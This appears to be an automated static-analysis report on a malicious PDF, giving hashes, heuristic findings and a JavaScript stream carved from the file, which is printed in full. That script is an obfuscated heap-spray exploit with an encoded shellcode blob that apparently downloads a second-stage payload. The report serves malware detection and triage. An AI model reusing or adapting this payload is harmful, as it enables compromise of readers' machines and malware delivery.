Malicious PDF — malware analysis report

Static analysis result for SHA-256 39eeb1a9bf66962f…

MALICIOUS

PDF

1.6 KB First seen: 2026-05-10
MD5: 4c038485cbea646dc3357ddc4adbc073 SHA-1: fe7532680cf641b5cf8b51aab82dbf55ffab369e SHA-256: 39eeb1a9bf66962f7182c7593c204a3f9297a1dfc0e4a020f029493265cae378
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream was found to be obfuscated and utilized the unescape() function, suggesting an attempt to hide malicious code. The primary function of this script appears to be downloading and executing a second-stage payload, as evidenced by the obfuscation and the nature of embedded scripts in similar documents. No specific family could be identified due to the obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    return unescape(fsjwfwf);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj111111_000.js pdf-javascript-stream PDF /JS object 111111 at offset 0x160 2543 bytes
SHA-256: 08493f26dadf6318f979b646e4c40aef3a6572ea9d7f71ba3cb16f2e8fc6f60a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function yshsiqx(fsjwfwf)
{
return unescape(fsjwfwf);
}
var blksjs = 'ARG0A0AARG0A0AARG0A0AARG0A0A'.replace(/ARG/igm,'%u');
var bvcues1 = 'ARG0A0AARG0A0A'.replace(/ARG/igm,'%u');
var ewkvxv7 = 'Z535XZ5251Z5756Z9c55ZXXe8ZXXXXZ5dXXZed83Z31XdZ64cXZ4XX3Z783XZ8bXcZXc4XZ7X8bZad1cZ4X8bZebX8Z8bX9Z344XZ4X8dZ8b7cZ3c4XZ5756Z5ebeZXXX1ZX1XXZbfeeZX14eZXXXXZefX1Zd6e8ZXXX1Z5fXXZ895eZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX263ZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZ78c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX26eZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZa6c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z9dXXZ5f5dZ5a5eZ5b59Zc358ZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ6547Z5474Z6d65Z5X7XZ7461Z4168Z4cXXZ616fZ4c64Z6269Z6172Z7972ZXX41Z6547Z5X74Z6f72Z4163Z6464Z6572Z7373Z57XXZ6e69Z7845Z6365ZbbXXZf289Zf789ZcX3XZ75aeZ29fdZ89f7Z31f9ZbecXZXX3cZXXXXZb5X3ZX21bZXXXXZad66Z85X3ZX21bZXXXXZ7X8bZ8378Z1cc6Zb5X3ZX21bZXXXXZbd8dZX21fZXXXXZX3adZ1b85ZXXX2ZabXXZX3adZ1b85ZXXX2Z5XXXZadabZ85X3ZX21bZXXXXZ5eabZdb31Z56adZ85X3ZX21bZXXXXZc689Zd789Zfc51Za6f3Z7459Z5eX4Zeb43Z5ee9Zd193ZX3eXZ2785ZXXX2Z31XXZ96f6Zad66ZeXc1ZX3X2Z1f85ZXXX2Z89XXZadc6Z85X3ZX21bZXXXXZebc3ZXX1XZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ89XXZ1b85ZXXX2Z56XXZe857Zff58ZffffZ5e5fZX1abZ8XceZbb3eZX274ZedebZ55c3Z4c52Z4f4dZ2e4eZ4c44ZXX4cZ5255Z444cZ776fZ6c6eZ616fZ5464Z466fZ6c69Z4165Z7XXXZ6664Z7X75Z2e64Z7865ZXX65Z7263Z7361Z2e68Z687XZXX7XZ7468Z7X74Z2F3AZ372FZ2E37Z3232Z2E31Z3531Z2E33Z3731Z2F38Z662EZ6867Z2F74Z2E6CZ687XZ3F7XZ3D69ZXX35Z9XXX'.replace(/Z/igm,'%u').replace(/X/igm,'0');
blksjs=yshsiqx(blksjs);
bvcues1=yshsiqx(bvcues1);
ewkvxv7=yshsiqx(ewkvxv7);
knhphta = blksjs + ewkvxv7;
izypgrd = 20 + knhphta.length;
while (bvcues1.length < izypgrd){bvcues1 += bvcues1;}
fueqeq = bvcues1.substr(0, izypgrd);
xpepds8 = bvcues1.substr(0, bvcues1.length - izypgrd);
while (xpepds8.length + izypgrd < 0x40000){xpepds8 = xpepds8 + xpepds8 + fueqeq;}
frdwh = new Array();
for (dvhwcwa = 0; dvhwcwa < 1400; dvhwcwa ++ ){frdwh[dvhwcwa] = xpepds8 + knhphta;}
var kocwfty2 = '0x145ad675de36e1'
for (dvhwcwa = 1; dvhwcwa <= 232; dvhwcwa ++ ){kocwfty2 = kocwfty2 + '0';}
kocwfty2=parseInt(kocwfty2);